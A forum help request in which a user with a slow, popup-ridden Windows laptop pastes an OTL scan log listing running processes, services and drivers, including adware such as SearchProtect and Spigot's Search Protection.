My computer is extremely slow and I am getting lots of popups.
OTL logfile created on: 02/06/2014 13:53:05 - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\paulj_000\Downloads
64bit- An unknown product (Version = 6.2.9200) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17031)
Locale: 00000809 | Country: United Kingdom | Language: ENG | Date Format: dd/MM/yyyy
3.90 Gb Total Physical Memory | 2.88 Gb Available Physical Memory | 73.96% Memory free
4.59 Gb Paging File | 3.48 Gb Available in Paging File | 75.89% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 914.79 Gb Total Space | 851.27 Gb Free Space | 93.06% Space Free | Partition Type: NTFS
Drive D: | 15.94 Gb Total Space | 1.58 Gb Free Space | 9.90% Space Free | Partition Type: NTFS
Computer Name: PC | User Name: paulj_000 | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan | Include 64bit Scans
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
========== Processes (SafeList) ==========
PRC - [2014/06/02 10:41:25 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\paulj_000\Downloads\OTL.exe
PRC - [2014/05/24 16:58:25 | 003,888,648 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\avastui.exe
PRC - [2014/05/23 08:31:06 | 004,879,680 | ---- | M] (Client Connect LTD) -- C:\Program Files (x86)\SearchProtect\SearchProtect\bin\cltmng.exe
PRC - [2014/05/23 08:31:06 | 003,080,000 | ---- | M] (Client Connect LTD) -- C:\Program Files (x86)\SearchProtect\UI\bin\cltmngui.exe
PRC - [2014/05/23 08:31:06 | 002,497,856 | ---- | M] (Client Connect LTD) -- C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe
PRC - [2014/05/21 16:30:50 | 000,846,696 | ---- | M] (Spigot, Inc.) -- C:\Users\paulj_000\AppData\Roaming\Search Protection\SearchProtection.exe
PRC - [2014/05/04 16:53:59 | 000,050,344 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\AvastSvc.exe
PRC - [2013/10/15 14:41:34 | 001,584,856 | ---- | M] (Hewlett-Packard) -- C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe
PRC - [2013/10/08 12:41:36 | 001,045,304 | ---- | M] (Hewlett-Packard Development Company, L.P.) -- C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPMSGSVC.exe
PRC - [2013/10/08 12:41:28 | 001,039,160 | ---- | M] (Hewlett-Packard Development Company, L.P.) -- C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe
PRC - [2013/09/05 06:44:18 | 000,298,760 | ---- | M] (CyberLink) -- C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSServerPDVD12.exe
PRC - [2013/09/05 06:44:16 | 000,077,576 | ---- | M] (CyberLink) -- C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSMonitorServicePDVD12.exe
PRC - [2013/09/02 03:18:24 | 000,267,224 | ---- | M] (CyberLink Corp.) -- C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe
PRC - [2013/08/05 08:49:42 | 000,111,576 | ---- | M] (CyberLink) -- C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
PRC - [2013/05/14 19:18:02 | 000,235,072 | ---- | M] (Internet Helper) -- C:\ProgramData\Internet Helper Anti-phishing\internetHelper_antiphishing.exe
========== Modules (No Company Name) ==========
MOD - [2014/05/20 18:20:13 | 000,080,696 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\HP.SupportFramework\7.0.0.1__d4a591153760ff28\HP.SupportFramework.dll
MOD - [2014/05/20 18:20:13 | 000,031,032 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\HP.SupportFramework.ServiceManager\7.0.0.1__afd7346f05a57c11\HP.SupportFramework.ServiceManager.dll
MOD - [2014/05/20 18:20:11 | 000,073,528 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\HP.SupportFramework.Common\7.0.0.1__41bdec5abf54f6dc\HP.SupportFramework.Common.dll
MOD - [2014/05/18 21:40:10 | 001,711,104 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\3bae4f8d09b11e0d9dc901df5effbf08\Microsoft.VisualBasic.ni.dll
MOD - [2014/05/11 19:49:46 | 000,220,672 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\CustomMarshalers\a7db022b87017cc62542ef85d19c7fb1\CustomMarshalers.ni.dll
MOD - [2014/05/11 19:49:33 | 000,978,432 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\97272e5adde36ea896d7216bf0270e15\System.Configuration.ni.dll
MOD - [2014/05/11 19:48:29 | 005,463,552 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\672138dc2f47a077f59ef14290a6973e\System.Xml.ni.dll
MOD - [2014/05/11 19:48:19 | 012,436,480 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\a673aacf407b499981342bb709cce917\System.Windows.Forms.ni.dll
MOD - [2014/05/11 19:48:03 | 001,593,344 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\d76ae95d56d39a59f727f5518ac8e396\System.Drawing.ni.dll
MOD - [2014/05/11 19:47:44 | 014,344,192 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\PresentationFramewo#\495d89631724cf0e7b1ace2c1edb4fa9\PresentationFramework.ni.dll
MOD - [2014/05/11 19:47:04 | 012,239,872 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\PresentationCore\7eb357737121e026292287e3f53aae21\PresentationCore.ni.dll
MOD - [2014/05/11 19:46:30 | 003,349,504 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\WindowsBase\3dce9bc573ada6f51434af3d3460a746\WindowsBase.ni.dll
MOD - [2014/05/11 19:46:21 | 007,993,856 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System\20af51394609c937507288c2b1cf2c8c\System.ni.dll
MOD - [2014/05/11 19:46:06 | 011,499,520 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\3de119146ed0e59408f896aa69cdfc42\mscorlib.ni.dll
MOD - [2014/05/04 16:54:11 | 019,336,120 | ---- | M] () -- C:\Program Files\AVAST Software\Avast\libcef.dll
MOD - [2013/08/23 11:29:26 | 000,069,120 | ---- | M] () -- C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll
MOD - [2013/08/05 16:48:08 | 000,016,856 | ---- | M] () -- C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvcPS.dll
MOD - [2013/08/05 08:49:47 | 000,627,672 | ---- | M] () -- C:\Program Files (x86)\CyberLink\Power2Go8\CLMediaLibrary.dll
========== Services (SafeList) ==========
SRV:64bit: - [2014/05/04 16:53:59 | 000,050,344 | ---- | M] (AVAST Software) [Auto | Running] -- C:\Program Files\AVAST Software\Avast\AvastSvc.exe -- (avast! Antivirus)
SRV:64bit: - [2014/04/27 16:23:08 | 005,100,384 | ---- | M] (Reimage®) [Auto | Running] -- C:\Program Files\Reimage\Reimage Repair\ReiGuard.exe -- (ReimageRealTimeProtection)
SRV:64bit: - [2014/03/24 03:31:14 | 000,347,880 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\NisSrv.exe -- (WdNisSvc)
SRV:64bit: - [2014/03/24 03:31:14 | 000,023,824 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\MsMpEng.exe -- (WinDefend)
SRV:64bit: - [2014/03/08 06:41:25 | 001,306,624 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\AppXDeploymentServer.dll -- (AppXSvc)
SRV:64bit: - [2014/03/06 08:02:13 | 000,834,560 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\netlogon.dll -- (Netlogon)
SRV:64bit: - [2014/03/06 07:34:46 | 000,201,216 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\AudioEndpointBuilder.dll -- (AudioEndpointBuilder)
SRV:64bit: - [2014/02/22 16:53:10 | 003,394,384 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\WSService.dll -- (WSService)
SRV:64bit: - [2014/02/22 10:57:16 | 000,710,656 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\lsm.dll -- (LSM)
SRV:64bit: - [2014/02/22 10:26:58 | 000,366,080 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wcmsvc.dll -- (Wcmsvc)
SRV:64bit: - [2014/02/22 10:25:39 | 000,399,872 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\das.dll -- (DeviceAssociationService)
SRV:64bit: - [2014/02/22 10:25:14 | 000,269,824 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\bisrv.dll -- (BrokerInfrastructure)
SRV:64bit: - [2014/02/22 10:23:58 | 001,576,960 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\wlidsvc.dll -- (wlidsvc)
SRV:64bit: - [2014/01/27 16:38:59 | 001,584,128 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\workfolderssvc.dll -- (workfolderssvc)
SRV:64bit: - [2013/12/10 08:35:18 | 000,530,944 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\AppReadiness.dll -- (AppReadiness)
SRV:64bit: - [2013/11/23 05:50:00 | 000,282,112 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\SystemEventsBrokerServer.dll -- (SystemEventsBroker)
SRV:64bit: - [2013/11/13 01:54:55 | 000,491,520 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\GeofenceMonitorService.dll -- (lfsvc)
SRV:64bit: - [2013/10/19 06:37:49 | 000,111,616 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV:64bit: - [2013/10/14 12:29:40 | 000,087,552 | ---- | M] (Softex Inc.) [Auto | Running] -- C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe -- (omniserv)
SRV:64bit: - [2013/10/14 12:23:20 | 000,109,568 | ---- | M] () [Auto | Running] -- C:\Program Files\Hewlett-Packard\SimplePass\cachesrvr.exe -- (Cachedrv server)
SRV:64bit: - [2013/08/26 07:13:24 | 000,076,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\inetsrv\w3logsvc.dll -- (w3logsvc)
SRV:64bit: - [2013/08/23 07:47:14 | 000,289,496 | ---- | M] (Realtek Semiconductor) [Auto | Running] -- C:\Program Files\Realtek\Audio\HDA\RTKAUDIOSERVICE64.EXE -- (RtkAudioService)
SRV:64bit: - [2013/08/22 13:31:56 | 002,899,968 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\spool\drivers\x64\3\PrintConfig.dll -- (PrintNotify)
SRV:64bit: - [2013/08/22 12:32:02 | 000,024,576 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wephostsvc.dll -- (WEPHOSTSVC)
SRV:64bit: - [2013/08/22 12:31:43 | 000,040,448 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\efssvc.dll -- (EFS)
SRV:64bit: - [2013/08/22 12:22:45 | 000,066,048 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wiarpc.dll -- (WiaRpc)
SRV:64bit: - [2013/08/22 12:21:15 | 000,013,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\svsvc.dll -- (svsvc)
SRV:64bit: - [2013/08/22 12:16:57 | 000,118,272 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\fhsvc.dll -- (fhsvc)
SRV:64bit: - [2013/08/22 11:25:28 | 000,164,352 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\NcaSvc.dll -- (NcaSvc)
SRV:64bit: - [2013/08/22 11:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicvss)
SRV:64bit: - [2013/08/22 11:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmictimesync)
SRV:64bit: - [2013/08/22 11:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicshutdown)
SRV:64bit: - [2013/08/22 11:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicrdv)
SRV:64bit: - [2013/08/22 11:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmickvpexchange)
SRV:64bit: - [2013/08/22 11:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicheartbeat)
SRV:64bit: - [2013/08/22 11:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicguestinterface)
SRV:64bit: - [2013/08/22 11:02:47 | 000,013,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\smphost.dll -- (smphost)
SRV:64bit: - [2013/08/22 10:57:25 | 000,130,560 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\ScDeviceEnum.dll -- (ScDeviceEnum)
SRV:64bit: - [2013/08/22 10:54:59 | 000,059,392 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\keyiso.dll -- (KeyIso)
SRV:64bit: - [2013/08/22 10:50:59 | 000,245,760 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\TimeBrokerServer.dll -- (TimeBroker)
SRV:64bit: - [2013/08/22 10:50:00 | 000,525,312 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netprofmsvc.dll -- (netprofm)
SRV:64bit: - [2013/08/22 10:45:59 | 000,151,040 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\ncbservice.dll -- (NcbService)
SRV:64bit: - [2013/08/22 10:40:49 | 000,248,832 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\vaultsvc.dll -- (VaultSvc)
SRV:64bit: - [2013/08/22 10:31:03 | 000,201,728 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\DeviceSetupManager.dll -- (DsmSvc)
SRV:64bit: - [2013/08/22 10:15:54 | 000,073,728 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\NcdAutoSetup.dll -- (NcdAutoSetup)
SRV:64bit: - [2013/07/01 21:08:48 | 000,822,232 | ---- | M] (Intel® Corporation) [On_Demand | Stopped] -- C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe -- (Intel®
SRV:64bit: - [2013/07/01 21:08:32 | 000,733,696 | ---- | M] (Intel® Corporation) [Auto | Running] -- C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe -- (Intel®
SRV:64bit: - [2009/11/17 12:14:26 | 000,098,208 | ---- | M] (Andrea Electronics Corporation) [Auto | Running] -- C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe -- (AERTFilters)
SRV - [2014/05/23 08:31:06 | 002,497,856 | ---- | M] (Client Connect LTD) [Auto | Running] -- C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe -- (CltMngSvc)
SRV - [2014/05/13 21:23:46 | 000,257,712 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2014/05/07 03:27:01 | 000,119,408 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2014/03/14 15:17:00 | 000,036,392 | ---- | M] (Just Develop It) [Auto | Running] -- C:\Program Files (x86)\MyPC Backup\BackupStack.exe -- (BackupStack)
SRV - [2013/11/13 01:54:53 | 000,357,376 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\GeofenceMonitorService.dll -- (lfsvc)
SRV - [2013/11/04 18:31:56 | 000,092,160 | ---- | M] (Hewlett-Packard Company) [Auto | Running] -- C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe -- (HP Support Assistant Service)
SRV - [2013/10/25 20:49:14 | 000,279,024 | ---- | M] (Intel Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\IntelCpHeciSvc.exe -- (cphs)
SRV - [2013/10/08 12:41:28 | 001,039,160 | ---- | M] (Hewlett-Packard Development Company, L.P.) [Auto | Running] -- C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe -- (HPWMISVC)
SRV - [2013/09/05 06:44:18 | 000,298,760 | ---- | M] (CyberLink) [Auto | Running] -- C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSServerPDVD12.exe -- (CyberLink PowerDVD 12 Media Server Service)
SRV - [2013/09/05 06:44:16 | 000,077,576 | ---- | M] (CyberLink) [Auto | Running] -- C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSMonitorServicePDVD12.exe -- (CyberLink PowerDVD 12 Media Server Monitor Service)
SRV - [2013/08/26 07:13:24 | 000,475,648 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\inetsrv\iisw3adm.dll -- (WAS)
SRV - [2013/08/26 07:13:24 | 000,066,560 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\inetsrv\w3logsvc.dll -- (w3logsvc)
SRV - [2013/08/26 07:13:24 | 000,062,464 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\inetsrv\apphostsvc.dll -- (AppHostSvc)
SRV - [2013/08/22 13:31:56 | 002,899,968 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\system32\spool\drivers\x64\3\PrintConfig.dll -- (PrintNotify)
SRV - [2013/08/22 04:55:35 | 000,018,944 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\StorSvc.dll -- (StorSvc)
SRV - [2013/08/22 03:53:34 | 000,011,776 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\smphost.dll -- (smphost)
SRV - [2013/08/07 02:34:24 | 000,312,448 | ---- | M] (Windows ® Win 7 DDK provider) [Auto | Running] -- C:\Program Files (x86)\Bluetooth Suite\AdminService.exe -- (AtherosSvc)
SRV - [2012/04/24 15:37:56 | 000,169,752 | ---- | M] (Intel Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Intel\Intel® Integrated Clock Controller Service\ICCProxy.exe -- (ICCS)
SRV - [2010/10/12 18:59:12 | 000,206,072 | ---- | M] (WildTangent, Inc.) [On_Demand | Stopped] -- C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe -- (GamesAppService)
========== Driver Services (SafeList) ==========
DRV:64bit: - [2014/05/19 16:58:07 | 001,039,096 | ---- | M] (AVAST Software) [File_System | System | Running] -- C:\Windows\SysNative\drivers\aswsnx.sys -- (aswSnx)
DRV:64bit: - [2014/05/19 16:58:06 | 000,423,240 | ---- | M] (AVAST Software) [File_System | System | Running] -- C:\Windows\SysNative\drivers\aswsp.sys -- (aswSP)
DRV:64bit: - [2014/05/19 16:58:06 | 000,085,328 | ---- | M] (AVAST Software) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\aswstm.sys -- (aswStm)
DRV:64bit: - [2014/05/04 16:54:22 | 000,208,416 | ---- | M] () [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\aswVmm.sys -- (aswVmm)
DRV:64bit: - [2014/05/04 16:54:22 | 000,079,184 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\Windows\SysNative\drivers\aswMonFlt.sys -- (aswMonFlt)
DRV:64bit: - [2014/05/04 16:54:22 | 000,065,776 | ---- | M] () [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\aswRvrt.sys -- (aswRvrt)
DRV:64bit: - [2014/05/04 16:54:22 | 000,029,208 | ---- | M] () [Kernel | Auto | Stopped] -- C:\Windows\SysNative\drivers\aswHwid.sys -- (aswHwid)
DRV:64bit: - [2014/05/04 16:54:20 | 000,093,568 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\aswRdr2.sys -- (aswRdr)
DRV:64bit: - [2014/03/24 03:30:57 | 000,257,880 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WdFilter.sys -- (WdFilter)
DRV:64bit: - [2014/03/24 03:30:57 | 000,123,224 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WdNisDrv.sys -- (WdNisDrv)
DRV:64bit: - [2014/03/24 03:27:03 | 000,035,856 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WdBoot.sys -- (WdBoot)
DRV:64bit: - [2014/03/20 04:41:20 | 000,376,152 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\clfs.sys -- (CLFS)
DRV:64bit: - [2014/03/13 13:35:24 | 000,157,016 | ---- | M] (Microsoft Corporation) [File_System | Boot | Running] -- C:\Windows\SysNative\drivers\wof.sys -- (Wof)
DRV:64bit: - [2014/03/08 21:40:16 | 000,136,024 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\wfplwfs.sys -- (WFPLWFS)
DRV:64bit: - [2014/03/08 21:35:45 | 000,467,800 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\USBHUB3.SYS -- (USBHUB3)
DRV:64bit: - [2014/02/22 17:00:25 | 000,236,888 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\sdbus.sys -- (sdbus)
DRV:64bit: - [2014/02/22 16:50:31 | 000,054,816 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\wpcfltr.sys -- (wpcfltr)
DRV:64bit: - [2014/02/22 16:49:51 | 000,325,464 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\USBXHCI.SYS -- (USBXHCI)
DRV:64bit: - [2014/02/22 16:49:49 | 000,384,856 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\spaceport.sys -- (spaceport)
DRV:64bit: - [2014/02/22 16:49:49 | 000,189,784 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\UCX01000.SYS -- (UCX01000)
DRV:64bit: - [2014/02/22 16:49:49 | 000,079,192 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\sdstor.sys -- (sdstor)
DRV:64bit: - [2014/02/22 16:49:47 | 000,146,776 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\msgpioclx.sys -- (GPIOClx0101)
DRV:64bit: - [2014/02/22 16:44:13 | 000,924,504 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\refs.sys -- (ReFS)
DRV:64bit: - [2014/02/22 13:14:02 | 000,033,280 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\BasicRender.sys -- (BasicRender)
DRV:64bit: - [2013/12/04 19:41:54 | 000,226,304 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthLEEnum.sys -- (BthLEEnum)
DRV:64bit: - [2013/11/13 01:54:52 | 000,175,960 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\VerifierExt.sys -- (VerifierExt)
DRV:64bit: - [2013/11/11 03:48:41 | 000,039,768 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\intelpep.sys -- (intelpep)
DRV:64bit: - [2013/11/01 12:39:53 | 000,086,872 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\pdc.sys -- (pdc)
DRV:64bit: - [2013/10/26 02:54:32 | 000,146,776 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SerCx2.sys -- (SerCx2)
DRV:64bit: - [2013/10/25 20:49:08 | 004,177,920 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)
DRV:64bit: - [2013/10/25 20:49:02 | 000,449,528 | ---- | M] (Intel® Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\IntcDAud.sys -- (IntcDAud)
DRV:64bit: - [2013/10/05 16:25:54 | 000,057,176 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\stornvme.sys -- (stornvme)
DRV:64bit: - [2013/09/20 06:10:18 | 000,533,232 | ---- | M] (Synaptics Incorporated) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\SynTP.sys -- (SynTP)
DRV:64bit: - [2013/09/20 06:10:18 | 000,034,544 | ---- | M] (Synaptics Incorporated) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Smb_driver_Intel.sys -- (SmbDrvI)
DRV:64bit: - [2013/09/20 06:10:18 | 000,030,448 | ---- | M] (Synaptics Incorporated) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\Smb_driver_AMDASF.sys -- (SmbDrv)
DRV:64bit: - [2013/08/26 23:54:36 | 000,263,896 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\RtsUStor.sys -- (RSUSBSTOR)
DRV:64bit: - [2013/08/23 02:11:12 | 003,860,480 | ---- | M] (Qualcomm Atheros Communications, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\athwbx.sys -- (athr)
DRV:64bit: - [2013/08/22 23:51:12 | 000,039,320 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\intelaud.sys -- (intaud_WaveExtensible)
DRV:64bit: - [2013/08/22 23:51:12 | 000,026,008 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\iwdbus.sys -- (iwdbus)
DRV:64bit: - [2013/08/22 20:12:11 | 000,027,488 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)
DRV:64bit: - [2013/08/22 20:12:07 | 000,037,216 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\terminpt.sys -- (terminpt)
DRV:64bit: - [2013/08/22 14:25:40 | 000,043,008 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\condrv.sys -- (condrv)
DRV:64bit: - [2013/08/22 14:25:40 | 000,030,048 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:64bit: - [2013/08/22 13:50:19 | 000,057,696 | ---- | M] (Microsoft Corporation) [Kernel | System | Stopped] -- C:\Windows\SysNative\drivers\dam.sys -- (dam)
DRV:64bit: - [2013/08/22 13:49:54 | 000,079,712 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\acpiex.sys -- (acpiex)
DRV:64bit: - [2013/08/22 13:49:33 | 000,159,584 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\tpm.sys -- (TPM)
DRV:64bit: - [2013/08/22 13:43:49 | 000,063,840 | ---- | M] (Marvell Semiconductor, Inc.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\mvumis.sys -- (mvumis)
